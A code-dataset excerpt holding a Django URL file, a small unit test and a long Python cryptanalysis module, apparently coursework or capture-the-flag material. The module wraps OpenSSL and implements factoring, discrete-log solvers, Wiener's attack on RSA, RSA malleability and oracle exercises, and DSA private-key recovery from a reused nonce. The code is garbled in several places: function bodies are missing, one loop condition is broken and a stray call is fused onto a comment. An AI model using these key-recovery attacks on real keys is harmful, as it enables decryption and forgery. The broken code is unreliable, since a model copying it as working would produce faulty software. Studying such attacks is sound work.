
import views\n\napp_name = 'schedule'\n\nurlpatterns = [\n    url(r'^$', views.dashboard, name=\"dashboard\"),\n    url(r'^add-schedule/$', views.addSchedule, name=\"add-schedule\"),\n    url(r'^update-schedule/(?P[0-9])/$', views.updateSchedule, name=\"update-schedule\"),\n    url(r'^delete-schedule/(?P[0-9])/$', views.deleteSchedule, name=\"delete-schedule\"),\n    url(r'^mark/(?P[0-9])/(?P[0-9])$', views.mark, name=\"mark\"),\n]\n","sub_path":"schedule/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":516,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"626185279","text":"# coding=utf-8\nfrom unittest import TestCase\nfrom schematics.models import Model\nfrom schematics.types import StringType\nfrom schematics.types.compound import PolymorphicType\n\n\nclass Parent(Model):\n    model_type = StringType(required=True)\n\n\nclass Person(Parent):\n    name = StringType()\n\n\nclass Item(Parent):\n    description = StringType()\n\n\nclass Container(Model):\n    obj = PolymorphicType(type_attr_map={\n        'I': Item,\n        'P': Person\n    }, attr_name='model_type')\n\n\nclass SchematicsSubclassTypeTests(TestCase):\n    def test_serializes_into_heterogenous_types(self):\n        c = Container(**{\n            'obj': {\n                'model_type': 'I',\n                'description': 'test description'\n            }\n        })\n\n        self.assertEqual(c.obj.description, 'test description')\n\n        c2 = Container(**{\n            'obj': {\n                'model_type': 'P',\n                'name': 'test name'\n            }\n        })\n\n        self.assertEqual(c2.obj.name, 'test name')","sub_path":"tests/test_polymorphic_type.py","file_name":"test_polymorphic_type.py","file_ext":"py","file_size_in_byte":1000,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"197171912","text":"import subprocess\nimport base64\nimport json\nfrom hashlib import sha256\nimport sympy #https://docs.sympy.org/latest/modules/ntheory.html\nimport math\nimport gmpy2\nfrom Crypto.PublicKey import DSA\n\n# in case of problem, this exception is raised\nclass OpensslError(Exception):\n    pass\n\n\ndef encrypt(plaintext, passphrase, cipher='aes-128-cbc'):\n    \"\"\"invoke the OpenSSL library (through the openssl executable which must be\n    present on your system) to encrypt content using a symmetric cipher.\n\n    The passphrase is a str object (a unicode string)\n    The plaintext is str() or bytes()\n    The output is a str() holding the base64-encoded ciphertext\n\n    # encryption use\n    >>> message = \"texte avec caractères accentués\"\n    >>> c = encrypt(message, 'foobar')\n    \n    \"\"\"\n    \n    # prepare arguments to send to openssl\n    pass_arg = 'pass:{0}'.format(passphrase)\n    args = ['openssl', 'enc', '-' + cipher, '-base64', '-pass', pass_arg, '-pbkdf2']\n    \n    # if the clear message is a unicode string, we have to encode it in bytes() \n    # to be able to send it in the pipeline to openssl\n    if isinstance(plaintext, str):\n        plaintext = plaintext.encode('utf-8')\n\n    # send the plaintext in the stdin of openssl, recover stdout and stderr\n    # To print the invoked command\n    # print('debug : {0}'.format(' '.join(args)))\n    result = subprocess.run(args, input=plaintext, stdout=subprocess.PIPE, stderr=subprocess.PIPE)\n\n    # if an error message is present on stderr, we stop\n    # attention, in stderr we recover bytes(), so we have to convert\n    error_message = result.stderr.decode()\n    if error_message != '':\n        raise OpensslError(error_message)\n\n    # OK, openssl sent the cipher in stdout, in base64.\n    # We recover bytes, so we have to convert it into a unicode string\n    return result.stdout.decode()\n\n\ndef decrypt(ciphertext, passphrase, 
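# Aside (editorial round-trip check for the encrypt()/decrypt() wrappers in
# this module): it shells out to a real `openssl` binary, so it is guarded
# with shutil.which() and assumes OpenSSL >= 1.1.1 for -pbkdf2. stdlib only:
import shutil
import subprocess

if shutil.which("openssl"):
    enc = ["openssl", "enc", "-aes-128-cbc", "-base64", "-pass", "pass:foobar", "-pbkdf2"]
    ct = subprocess.run(enc, input=b"hello", stdout=subprocess.PIPE, check=True).stdout
    pt = subprocess.run(enc[:2] + ["-d"] + enc[2:], input=ct,
                        stdout=subprocess.PIPE, check=True).stdout
    assert pt == b"hello"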
cipher='aes-128-cbc'):\n \n pass_arg = 'pass:{0}'.format(passphrase)\n args = ['openssl', 'enc', '-d', '-' + cipher, '-base64', '-pass', pass_arg, '-pbkdf2']\n \n if isinstance(ciphertext, str):\n ciphertext = ciphertext.encode('utf-8')\n\n result = subprocess.run(args, input=ciphertext, stdout=subprocess.PIPE, stderr=subprocess.PIPE)\n\n error_message = result.stderr.decode()\n if error_message != '':\n raise OpensslError(error_message)\n\n return result.stdout.decode()\n\ndef pkeyencrypt(filetext, keyfile, isFiletext):\n \"\"\"invoke the OpenSSL library (though the openssl executable which must be\n present on your system) to encrypt content using an asymmetric cipher with public key.\n\n The plaintext is str() or bytes()\n The key is a file that contains the public key (in base64)\n isFiletext is a bool to know if filetext is a file that contains the key or a string\n The output is bytes()\n\n # encryption use\n >>> message = mdg.txt\n >>> key = \"./key.txt\"\n >>> c = encrypt(msg.txt, key, true)\n \n \"\"\"\n \n if isFiletext :\n with open(filetext) as f:\n plaintext = f.read()\n f.closed\n \n else :\n plaintext=filetext\n \n args = ['openssl', 'pkeyutl', '-encrypt', '-pubin', '-inkey', keyfile]\n \n if isinstance(plaintext, str):\n plaintext = plaintext.encode('utf-8')\n \n result = subprocess.run(args, input=plaintext, stdout=subprocess.PIPE, stderr=subprocess.PIPE)\n\n error_message = result.stderr.decode()\n if error_message != '':\n raise OpensslError(error_message)\n\n return base64.b64encode(result.stdout).decode()\n\n\ndef pkeydecrypt(filetext, keyfile, isFiletext):\n \"\"\"invoke the OpenSSL library (though the openssl executable which must be\n present on your system) to decrypt content using an asymmetric cipher with private key.\n\n The ciphertext is in base64\n The key is a file that contains the private key (in base64)\n isFiletext is a bool to know if filetext is a file that contains the key or a string\n The output is bytes()\n\n # encryption use\n >>> message = msg.txt\n >>> key = \"./key.txt\"\n >>> c =decrypt(msg.txt, key, true)\n \n \"\"\"\n \n if isFiletext :\n with open(filetext) as f:\n ciphertext = f.read()\n f.closed\n else :\n ciphertext=filetext\n\n args = ['openssl', 'pkeyutl', '-decrypt', '-inkey', keyfile]\n\n ciphertext = base64.b64decode(ciphertext)\n \n result = subprocess.run(args, input=ciphertext, stdout=subprocess.PIPE, stderr=subprocess.PIPE)\n\n error_message = result.stderr.decode()\n if error_message != '':\n raise OpensslError(error_message)\n\n return result.stdout.decode()\n\n\ndef hybrid(filetext, keyfile, passphrase):\n \"\"\" cipher a message using the hybrid method\n invoke the encrypt method to encrypt the message with passphrase\n then invoke the pkeyencrypt function to encrypt the passphrase with the\n public key contained in keyfile.\n \n filetext is the message in plain text\n keyfile is the public key in base64\n passphrase is in ascii\n \n the output is a serialized dictionary in JSON\n \"\"\"\n \n with open(filetext) as f:\n plaintext = f.read()\n f.closed\n\n passphrase=passphrase.encode()\n \n try :\n ciphertext=encrypt(plaintext, passphrase)\n except OpensslError :\n raise\n \n try :\n passphrase=pkeyencrypt(passphrase, keyfile, False)\n except OpensslError :\n raise\n \n dict={\"session_key\" : passphrase, \"payload\" : ciphertext}\n \n return json.dumps(dict)\n\ndef hybridDecrypt(file_enc, keyfile):\n \"\"\" Decrypt a dictionary serialized in json and encrypted with the hybrid method\n file_enc.txt is the dictionary 
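Hypothetical usage of the hybrid/hybridDecrypt helpers above; 'msg.txt', 'msg.enc' and both key paths are placeholder file names, not files from the original project:

```python
# Hypothetical round trip with the helpers above; all file names
# are placeholders.
envelope = hybrid('msg.txt', 'recipient_pub.pem', 'one-time-session-key')
with open('msg.enc', 'w') as f:
    f.write(envelope)   # JSON: {"session_key": "...", "payload": "..."}

plaintext = hybridDecrypt('msg.enc', 'recipient_priv.pem')
```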
serialized in json\n keyfile is the private key of the user\n \n the output is the plaintext\n \"\"\"\n \n with open(file_enc) as f:\n dic = f.read()\n f.closed\n\n dic = json.loads(dic)\n \n try :\n passphrase = pkeydecrypt(dic[\"session_key\"].encode(), keyfile, False)\n except OpensslError :\n raise\n \n return decrypt(dic[\"payload\"], passphrase)\n\n\ndef myhash(doc) :\n \"\"\"Hash the content of a file with sha256\"\"\"\n with open(doc) as f:\n plaintext = f.read()\n f.closed\n\n result=sha256(plaintext.encode())\n return result.hexdigest()\n\n\ndef sign(doc, filekey) :\n \"\"\"Sign the content of a file invoking openssl\n @param doc : The file to sign\n @param filekey : file containing the key\n \"\"\"\n\n args = ['openssl', 'dgst', '-sign', filekey,'-sha256', doc]\n\n result = subprocess.run(args, stdout=subprocess.PIPE, stderr=subprocess.PIPE)\n\n error_message = result.stderr.decode()\n if error_message != '':\n raise OpensslError(error_message)\n\n return base64.b64encode(result.stdout).decode()\n\n\ndef sign2(msg, filekey) :\n \"\"\"Sign a message invoking openssl\n @param msg : The message to sign\n @param filekey : file containing the key\n \"\"\"\n\n args = ['openssl', 'dgst', '-sign', filekey,'-sha256']\n\n result = subprocess.run(args, input=msg.encode(), stdout=subprocess.PIPE, stderr=subprocess.PIPE)\n\n error_message = result.stderr.decode()\n if error_message != '':\n raise OpensslError(error_message)\n\n return base64.b64encode(result.stdout).decode()\n\n\ndef verify_sign(filekey, signature, msg) :\n \"\"\"Verify a Signature of a message invoking openssl\n @param filekey : file containing the key\n @param signature : signature to verify\n @param msg : The message that was signed\n \"\"\"\n \n with open('/tmp/sign.txt', 'wb') as f :\n f.write(base64.b64decode(signature))\n \n args = ['openssl', 'dgst', '-sha256', '-verify', filekey, '-signature', '/tmp/sign.txt']\n\n result = subprocess.run(args, input=msg.encode(), stdout=subprocess.PIPE, stderr=subprocess.PIPE)\n\n error_message = result.stderr.decode()\n if error_message != '':\n raise OpensslError(error_message)\n\n return result.stdout.decode()=='Verified OK\\n'\n \n\ndef hexdeugtoint(hexdeg, isFile) :\n \"\"\"Convert an hexa number returning by openssl in string with some ':' to int\"\"\"\n if isFile:\n with open(hexdeg) as f:\n texthex = f.read()\n f.closed\n else :\n texthex=hexdeg\n\n strhex=\"\"\n for c in texthex :\n if(c!=':' and c!='\\n') :\n strhex+=c\n \n return int(strhex, base=16)\n\n\ndef pollardrho(n):\n \"\"\"Factorization of a decomposable integer using the rho pollard method\"\"\"\n f = lambda z: z*z+1\n x, y, d = 2, 2, 1\n while d==1:\n x = f(x) % n\n y = f(f(y)) % n\n d = math.gcd(x-y, n)\n return d\n\n\ndef euclideE(a,N):\n \"return the modular inverse of a mod N : c like a*c=1 mod N\"\n r0, r1 = a, N\n u0, u1 = 1, 0\n v0, v1 = 0, 1\n while(not(r1==0)):\n q = int(r0//r1)\n r, u, v = r1, u1, v1\n r1 = r0 - q * r1\n u1 = u0 - q * u1\n v1 = v0 - q * v1\n r0, u0, v0= r, u, v\n if (r0 == 1): \n return u0%N\n raise ValueError('the number is not inversible')\n\n\n\ndef integralPowerOf2(z) :\n \"\"\"is z a integral power of 2?\"\"\"\n return (z & (z-1))==0\n\ndef brentWithBatchGCD(N):\n \"\"\" Find the cycle of pollard rho with brent method applaying the batch gcd :\n instead of computing gcd(xi-xm) in all iterations, wait the cpt-th iteration\n and compute gcd of (x0-x1)...(xcpt-1 - xcpt) with N.\n \"\"\"\n xi=1\n xm=1\n s=1\n cpt=0\n i=1\n while True :\n #print(i)\n cpt+=1\n xi=(xi*xi + 1) % N # f(x) 
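pollardrho above is Floyd-cycle Pollard rho with f(z) = z^2 + 1 and starting point 2; a standalone copy of the same loop, checked on the textbook semiprime 8051 = 83 x 97, which this exact setup factors:

```python
# Standalone check of the Pollard rho routine above on 8051 = 83 * 97.
import math

def pollard_rho_demo(n):
    f = lambda z: (z * z + 1) % n
    x = y = 2
    d = 1
    while d == 1:
        x = f(x)          # tortoise: one step
        y = f(f(y))       # hare: two steps
        d = math.gcd(x - y, n)
    return d

d = pollard_rho_demo(8051)
assert 1 < d < 8051 and 8051 % d == 0
print(d, 8051 // d)   # the two prime factors, 97 and 83
```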
= x^2 + c (pas de bébé)\n # normaly,s = math.gcd(xi-xm, N), we accumulate cpt values of xi-xm then compute the gcd\n s = (s*(xi-xm)) % N # f(f(y)) -> pas de géant\n if cpt==10 :\n s=math.gcd(s, N) # we compute gcd of accumulated values\n if s!= 1 and s != N : # (x=y) ?\n print(s)\n return s, N//s\n s=1\n cpt=0\n if integralPowerOf2(i) :\n xm=xi\n print(i)\n i+=1\n\ndef brentMultipleFactors(N) :\n \"\"\" Find all the prime factors of N (more than 2) by the brent's cycle finding with batch gcd\n \"\"\"\n res=[]\n facts=0,0\n while(not(gmpy2.is_prime(facts[1]))) :\n facts=brentWithBatchGCD(N)\n res+=[facts[0]]\n N=facts[1]\n res+=[facts[1]]\n return res\n\n \ndef pollard_p1(N, B, maxB=1) :\n \"\"\"Factorize N with pollard's p-1 method with p-1 1e7 smooth\"\"\"\n B=int(B)\n maxB=int(maxB)\n if maxB>> h : element of the group\n >>> g : generator of the group\n >>> p : the modulus\n >>> out : x such that h = g^x mod p\n \"\"\"\n print('Running Shanks algorithm')\n hashtable={}\n T=int(math.sqrt(p)/2)+1\n S=pow(g, -T, p)\n u, i = h, 0\n while True :\n if u in hashtable :\n return i*T+hashtable[u]\n hashtable[u]=i\n u=(u*S) % p\n raise OpensslError('Log not found') \n\"\"\"\n #[OR]\n gpow=1\n #Baby-step\n for j in range(m) :\n if not(j in hashtable) :\n hashtable[gpow]=j\n gpow=(gpow*g)%N\n #Giant-step\n inv=euclideE(gpow, N) #we compute g^-m mod N; après baby-step, gpow vaut g^m\n y=h\n for i in range(m) :\n if y in hashtable :\n return i*m+hashtable[y]\n y=(y*inv)%N\n \n raise OpensslError('Log not found')\n\"\"\" \n\n\ndef F(N, h, g, x) :\n mod=x%3\n if mod==0 :\n return (x*x) % N\n if mod==1 :\n return (x*g) % N \n return (x*h) % N\n\ndef G(x, a, q) :\n mod=x%3\n if mod==0 :\n return (a+a) % q\n if mod==1 :\n return (a+1) % q \n return a%q\n\ndef H(x, b, q) :\n mod=x%3\n if mod==0 :\n return (b+b) % q\n if mod==1 :\n return b%q \n return (b+1)%q\n \ndef pollardrhobrent(h, g, q, N) :\n \"\"\" Polllard rho algorithm for discrete log\n >>> h : element of the group\n >>> g : generator of the group\n >>> q : a prime number, q is the order of the group\n >>> N : the modulus\n >>> out : x such that h = g^x mod p\n \"\"\"\n print('Execution of pollard rho for discrete log...')\n a=A=0\n b=B=0\n x=X=2\n while True :\n prec=x\n x=F(N, h, g, x)\n a=G(prec, a, q)\n b=H(prec, b, q)\n \n prec=X\n X=F(N, h, g, X)\n A=G(prec, A, q)\n B=H(prec, B, q)\n \n prec=X\n X=F(N, h, g, X)\n A=G(prec, A, q)\n B=H(prec, B, q)\n \n if x==X :\n print('Detected!!!')\n subB = (B-b) % q\n if subB==0:\n raise OpensslError('Failure with r=0!!!')\n# gc = gmpy2.gcd(subB, q)\n# if(gc != 1):\n# print(\"gcd is different than 1\")\n# print(subB)\n res=(gmpy2.invert(subB, q) * (a-A)) % q\n print('Discrete Log found : ', res)\n return res\n\ndef crt(modulus, reminds, N) :\n \"\"\"compute the crt of x=reminds_i mod modulus_i\n N := prod(modulus[i])\n \"\"\"\n _sum=0\n for i in range(len(modulus)) :\n bi=N//modulus[i]\n ai=euclideE(bi, modulus[i])\n _sum=(_sum+reminds[i]*bi*ai)%N\n return _sum\n\ndef fullcrt(modulus, reminds, N) :\n \"\"\"compute the full crt of x=reminds_i mod modulus_i^ei\n N := prod(modulus[i]^ei)\n \"\"\"\n _sum=0\n for i in range(len(modulus)) :\n mod=pow(modulus[i][0], modulus[i][1], N)\n bi=N//mod\n ai=euclideE(bi, mod)\n _sum=(_sum+reminds[i]*bi*ai)%N\n return _sum\n\ndef rho_crtForDSA(y, q, g, p) :\n \"\"\" rho Pohlig–Hellman algorithm for log discrete. 
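The shanks routine above is baby-step giant-step; the same algorithm written out in full on a hand-checkable toy group, (Z/101Z)* with generator 2, using Fermat inversion since the modulus is prime:

```python
# Self-contained baby-step giant-step, mirroring the Shanks routine
# above, on the toy group (Z/101Z)* with generator 2.
import math

def bsgs(g, h, p):
    """Return x with g**x == h (mod p), p prime."""
    m = math.isqrt(p) + 1
    baby = {}
    gpow = 1
    for j in range(m):                 # baby steps: g^j
        baby.setdefault(gpow, j)
        gpow = (gpow * g) % p
    # gpow is now g^m; invert it via Fermat since p is prime
    giant = pow(gpow, p - 2, p)        # g^(-m) mod p
    y = h
    for i in range(m):                 # giant steps: h * g^(-i*m)
        if y in baby:
            return i * m + baby[y]
        y = (y * giant) % p
    raise ValueError('log not found')

x = bsgs(2, 63, 101)
assert pow(2, x, 101) == 63   # x == 47 for this toy instance
```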
\n Only for when all factors of the prime number (q) are distincts\n >>> y : element of the group\n >>> g : generator of the group\n >>> q : a prime number, q is the order of the group\n >>> p : the modulus\n >>> out : xi such that yi = gi^xi mod qi\n \"\"\"\n #factorisation of q\n print('-------------Finding all prime factors of q with Brent...')\n facts=brentMultipleFactors(q)\n print('Factors of q:', facts)\n \n #for test\n res = 1\n for x in facts:\n res *= x\n assert(res == q)\n \n #finding xi such as x=xi mod qi\n xi=[0] * len(facts)\n# xi[0]=98699490457#xi[1]=5765645707541#xi[2]=4726762747214#xi[3]=3364793818732#xi[4]=4967610363304#xi[5]=12389327632936\n \n for i in range(len(facts)) :\n print('-------------Finding x'+str(i)+' with Pollard rho for DL...')\n #prod of qj without qi\n prod=q//facts[i]\n _y= pow(y, prod, p)\n _g= pow(g, prod, p)\n xi[i]=pollardrhobrent(_y, _g, facts[i], p)\n \n assert(pow(_g, xi[i], p) == _y)\n\n \n #crt to reconstruct x\n #x = x0 mod q0\n #x = x1 mod q1\n #...\n #x = xn mod qn\n #with q0*q1*...*qn=q\n # -> crt to find x mod q0*q1*q2*...*qn = x mod q (qi are coprimes)\n print('-------------Finding x with CRT...')\n res=crt(facts, xi, q)\n return res\n\ndef subpohligprimepower(h , g, p, e, mod) :\n \"\"\"Pohlig–Hellman algorithm applied to the specific case for groups whose order is a prime power\n >>> h : element of the group\n >>> g : generator of the group\n >>> p : a prime power, p^e is the order of the group\n >>> mod : the modulus\n >>> out : x such that h = g^x mod p^e\n \"\"\"\n n=pow(p, e, mod)\n xk=0\n gamma=pow(g, pow(p, e-1, n), mod)\n for k in range(e) :\n gpow=pow(g, xk, mod)\n hk=pow(gmpy2.invert(gpow, mod)*h, pow(p, e-1-k, n), mod) #hk <- ((g^-x_k)*h)^(p^(e-1-k))\n dk=pollardrhobrent(hk, gamma, p, mod)\n xk=(xk+pow(p, k, mod)*dk)%n\n return xk\n\n\ndef dlg_fullpohlighellman(y, q, g, p) :\n \"\"\"Full Pohlig–Hellman algorithm applied for discrete log when q can have multiple identique factors\n >>> y : element of the group\n >>> q : order of the group\n >>> g : generator of the group\n >>> p : a prime number, the modulus\n >>> out : x such that y = g^x mod p\n \"\"\"\n print('-------------Finding all prime factors of q with Brent...')\n facts=brentMultipleFactors(q)\n dis_facts=[] #distincts factors of q\n e=1\n i=0\n while i 1\n ni = e[i]*n[i-1] + n[i-2]\n di = e[i]*d[i-1] + d[i-2]\n n.append(ni)\n d.append(di)\n yield (ni, di)\n #return n,dverify_sign('police/hush/dillonlambert_pk.pem','pLvYvgpez+9wXC797rPL2rSwYNrxt4HL8XE+91lxmrMUiAjq0TckCCt/PJ5lqtW+8Vc6SRDkefJm2eqeYSNvMq3FBt3XDA9VzZ7qUjiN2xXIRcvXbrc7kKk+Tc/D/rreciyKuZut8gW0a/gpyM2cVD7UqGzljoEBnXyN/rioelT/P5Bg5f61U3LikdZvsP64bpa0nosTD3q9ZHdyhPZ6e7Wxi51jp+twEu6WD5D+3WMEYCwJqdyIFMh9fFQBiW2IxkTOI3ofheN4PyEZO7bXOl9t0EHocFqTzzF4i4LNn10RoQfy7iwk9R5poOyWfwS/qys3OIyrtjCRuCl4pggodw==', 'manger')\n\ndef wienerAttack(e, N) :\n print('[-] Finding the continued fractions expansion convergents of e/N...')\n cf_exp= cf_expansion(e, N)\n cvgts= convergents(cf_exp)\n print('[+] continued fractions expansion convergents found')\n print(cf_exp)\n\n print('[-] Iterating over convergents; '\n 'Testing correctness through factorization.')\n for pk, pd in cvgts: # pk - possible k, pd - possible d\n if pk == 0:\n continue;\n possible_phi = (e*pd - 1)//pk\n p = sympy.Symbol('p', integer=True)\n roots = sympy.solve(p**2 + (possible_phi - N - 1)*p + N, p)\n\n if len(roots) == 2:\n pp, pq = roots # pp - possible p, pq - possible q\n if pp*pq == N:\n print('[+] Factoriisation of N found : p,q = (', pp, ',', pq, 
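The cf_expansion/convergents pair that wienerAttack consumes computes a continued-fraction expansion and its convergents via the standard recurrence; a compact standalone version, checked against 649/200 = [3; 4, 12, 4]:

```python
# Continued-fraction machinery as used by wienerAttack above,
# checked on 649/200 whose expansion is [3; 4, 12, 4].
def cf_terms(num, den):
    while den:
        q, r = divmod(num, den)
        yield q
        num, den = den, r

def cf_convergents(terms):
    # standard recurrence: h_i = a_i*h_{i-1} + h_{i-2}, same for k_i
    h_prev, h_curr = 0, 1
    k_prev, k_curr = 1, 0
    for a in terms:
        h_prev, h_curr = h_curr, a * h_curr + h_prev
        k_prev, k_curr = k_curr, a * k_curr + k_prev
        yield h_curr, k_curr

terms = list(cf_terms(649, 200))
assert terms == [3, 4, 12, 4]
convs = list(cf_convergents(terms))
assert convs[:2] == [(3, 1), (13, 4)]
assert convs[-1] == (649, 200)   # the last convergent is the fraction itself
```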
')')\n return pp,pq\n\n print('[-] Wiener\\'s Attack failed; Factoriisation not found :(')\n \n\n\"\"\"------------------------------BEGIN TRAINING------------------------------\"\"\"\n \ndef train_eqlin(a, b, n) :\n \"\"\"return X such that a * X + b == 0 [modulo n]\n and X is known existed\n \"\"\"\n # aX + b = 0 mod n => aX = -b mod n\n return gmpy2.divm(-b, a, n)\n\ndef train_generator(q, a, b) :\n \"\"\"find G such taht G must be a generator of order q modulo P.\n P must be prime, and such that a <= P < b.\n \"\"\"\n k= math.ceil(a//q) #for q multiple > a\n p = a\n while p < b-1 :\n qm = q*k #multiple of q between a and b\n p = qm + 1\n if gmpy2.is_prime(p) :\n print('[+] p-1 multiple of q found...')\n #rs = gmpy2.random_state(hash(gmpy2.random_state()))\n h = 2#+int(gmpy2.mpz_random(rs, p-4)) # random g in [2, p-2]\n g = pow(h, (p-1)//q, p)\n if pow(g, q, p)==1 :\n print('[+] Generator G =', g, 'with P =', p, 'found')\n return g,p\n \n print('[-] Failed ! Trying with next multiple of q...')\n k+=1\n \n print('[-] Failed to find generator')\n raise ValueError()\n \ndef train_sqrt_modp(x, p) :\n \"\"\"Find the two square roots of x modulo p,\n convert them to bytes and print them.\n \"\"\"\n roots=sympy.sqrt_mod(x, p, all_roots=True)\n return (base64.b16decode(hex(roots[0])[2:], casefold=True), \n base64.b16decode(hex(roots[1])[2:], casefold=True))\n \ndef train_rsa_reduction(n, e, d) :\n \"\"\"You are given an RSA secret key.\n Find p and q and convert them to bytes\n \n code from : https://gist.github.com/ddddavidee/b34c2b67757a54ce75cb\n \"\"\"\n k = d * e - 1\n if gmpy2.is_odd(k) :\n raise ValueError('Prime factors p and q not found')\n else:\n t = 0\n r = k\n while(not gmpy2.is_odd(r)):\n r = int(r // 2)\n t += 1\n for i in range(1, 101):\n rs = gmpy2.random_state(hash(gmpy2.random_state()))\n g = int(gmpy2.mpz_random(rs, n)) # random g in [0, n-1]\n y = pow(g, r, n)\n if y == 1 or y == n - 1:\n continue\n else:\n for j in range(1, t): # j \\in [1, t-1]\n x = pow(y, 2, n)\n if x == 1:\n p, q = outputPrimes(y - 1, n)\n return (base64.b16decode(hex(p)[2:], casefold=True), \n base64.b16decode(hex(q)[2:], casefold=True))\n elif x == n - 1:\n continue\n y = x\n x = pow(y, 2, n)\n if x == 1:\n p, q = outputPrimes(y - 1, n)\n return (base64.b16decode(hex(p)[2:], casefold=True), \n base64.b16decode(hex(q)[2:], casefold=True))\n\ndef outputPrimes(a, n):\n p = int(gmpy2.gcd(a, n))\n q = int(n // p)\n if p > q:\n p, q = q, p\n return p,q \n\ndef train_rsa_malleability(n, e, C, Ci, Ma) :\n \"\"\" Algo description on https://crypto.stackexchange.com/questions/2323/how-does-a-chosen-plaintext-attack-on-rsa-work\n \n You are given an RSA public-key (n, e) and a ciphertext (C).\n If you provide a **different** ciphertext (Ca =! 
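train_sqrt_modp above delegates the modular square root to sympy; a quick check of that call, imported explicitly from sympy.ntheory, on a toy prime:

```python
# Quick check of the sympy call used by train_sqrt_modp above:
# the two square roots of 2 modulo 7 are 3 and 4 (3*3 = 9 = 2, 4*4 = 16 = 2).
from sympy.ntheory import sqrt_mod

roots = sqrt_mod(2, 7, all_roots=True)
assert sorted(roots) == [3, 4]
assert all(pow(r, 2, 7) == 2 for r in roots)
```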
C), it will be decrypted.\n You must decrypt, convert to bytes and print the original text\n \n This is an Chosen-plaintext attack\n \n >>> n, e : public Key (modulus and exponent)\n >>> C : the ciphertext to break\n >>> Ci : The chosen ciphertext (without the pow 2) by attacker sent to Alice\n exple : if the ciphertext sent is 2^e, Ci=2\n >>> Ma : The plaintext corresponding to Ca (decrypted by Alice)\n \n Output : the plaintext corresponding to C\n \"\"\"\n #We know C = t^e mod n\n #we chose Ci=2^e and send Ca = Ci*C = 2^e * t^e = (2*t)^e\n #Alice will decrypt and will send us Ma = ((2*t)^e)^d = 2*t\n return (base64.b16decode(hex(Ma//Ci)[2:], casefold=True))\n\ndef train_rsa_msb(LB) :\n \"\"\"Obtain and print the plaintext with given an RSA public-key \n (the modulus n, the exponent e) and a ciphertext c.\n An oracle is available :\n If you provide a ciphertext, you will be given the MSB\n of the plaintext (i.e. True when plaintext >= n/2)\n \"\"\"\n #Let c the ciphertext and P the corresponding plaintext\n # rsa_msb c -> 0 => P < n/2\n # rsa_msb 2^e * c -> 0 => 2*P < n/2 => P < n/4\n #...\n #(applying successive dichotomie log2n * 2 time, we find LB<=P<=UB and LB==UB)\n #See train_rsa_msb/msb_client.py and train_rsa_msb/msb_netringsEncrypt.py\n #and execute :\n #>>> python3 train_rsa_msb/msb_client.py\n print(base64.b16decode(hex(LB)[2:], casefold=True))\n\n\"\"\"------------------------------END TRAINING------------------------------\"\"\"\n\n\ndef DSAregenK(p, q, g, y, r, s1, s2, file_msg1, file_msg2) :\n \"\"\"Recover the private key (x) of signed DSA messages with weak random k : k is not unique for all message\n Here, k is the same for the both message so r1 = r2 = r\n >>> p, q, g, y : the DSA public Key of the signed messages param\n >>> r, s1 : DSA signature of the message m1\n >>> r, s2 : DSA signature of the message m2\n >>> file_msg1, file_msg2 : files to message m1 and m2\n \n #exec : DSAregenK(int('BDADCF08B14F1D0F2916BAF99BFE906C83F3CAACC8438ED19DCAB0E2B802AE720638E51084B3DE6A7971F397A996BA8ECF7D8304EA7BE78EFFD526B14AE6C38BE169D185AB5AAD5BFADCDDECB2901F6E1B6579254FBDC259FB06FAF6CED8A9AA77F26447C816EA66C39282186291BB53DF42AC4218945C1ABCEFD6C007C8CA5FD39F72D1409E0680E2F82CE95C0EC350A0C6AE78E531F24388783591E51620B91215F5A9E1544AACE24A9223DAFF437CEF375372A408F8091835AD55DDE1877A9AF30B6E625319C262105B62296FDB47238DDC08F3BC8B089BDB3AA528D6A52DC2323E18B9A6B9821CE81C3010BA3CE02DEF6E44CEF5529F20BF1C63004D9251', base=16), \n int('B44525D1BEBCD9D5DDB7FE84EE71A9117DC312173D3C96645A534E397F7BA395', base=16), \n int('4A9F9831BAE9D9E5A2FF813D1D69DEC22609A2C81F46057562D20DD15C4B398EC80C45AEB801021BD9CC2F3DE3EB59C556ADC6C83C791053EA4256FB44ECA40CD0F870F39B07CB973AED2348082B16347929892A7E80ED5E1DB6D55250B5A6BE245BC9F89431EBC79C0FF1FEDFAFC157CD12380F5FCBF34F1A64A59954CA1F8EE08F6E128E732297A481399A95C3F2540D40185AFB81816D727F39DF922DF2F6CEEB9FF35E1BC177B2009B6776D14EB9C2CF62B595925ED76C5545FD1968F76DCF25D9C80E0F319282407A499352AB9FE2D04A1323CE18B54C17998F3B851FCDAA9DE59CD0AD6350474BA4A6A6F591E069AE39A3068291D1486B7C6B0D14FB5A', base=16), \n 
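train_rsa_malleability above exploits the multiplicative homomorphism of textbook RSA; the whole chosen-ciphertext trick end-to-end on the classic toy key n = 3233, e = 17, d = 2753, where d merely stands in for the decryption oracle:

```python
# End-to-end sketch of the malleability attack above on a toy RSA key.
# n = 3233 = 61 * 53, e = 17, d = 2753; the attacker only uses (n, e)
# plus one decryption of a *different* ciphertext.
n, e, d = 3233, 17, 2753
m = 65                                  # secret plaintext
c = pow(m, e, n)                        # intercepted ciphertext

c_attack = (pow(2, e, n) * c) % n       # (2m)^e mod n, != c so the oracle accepts
m_attack = pow(c_attack, d, n)          # oracle decrypts: 2m mod n
recovered = m_attack // 2               # valid here since 2m < n
assert recovered == m
```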
